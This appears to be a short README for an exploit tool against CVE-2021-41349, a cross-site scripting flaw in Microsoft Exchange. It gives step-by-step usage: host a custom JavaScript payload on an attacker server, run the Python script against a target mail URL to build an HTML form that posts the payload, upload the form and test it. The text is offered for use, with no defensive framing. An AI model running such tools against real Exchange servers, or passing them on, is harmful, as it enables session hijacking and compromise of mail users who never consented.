Exploiting: CVE-2021-41349
This exploiting tool creates a Form for posting XSS Payload to the target Exchange server.
You need to create a js containing your desire to do.
- Create Your
jsPayload and upload it somewhare. - run the
CVE-2021-41349.pysame as following steps.
python3 CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.htmlor:
./CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html- Upload The
htmlfile into server. - Done! Test it!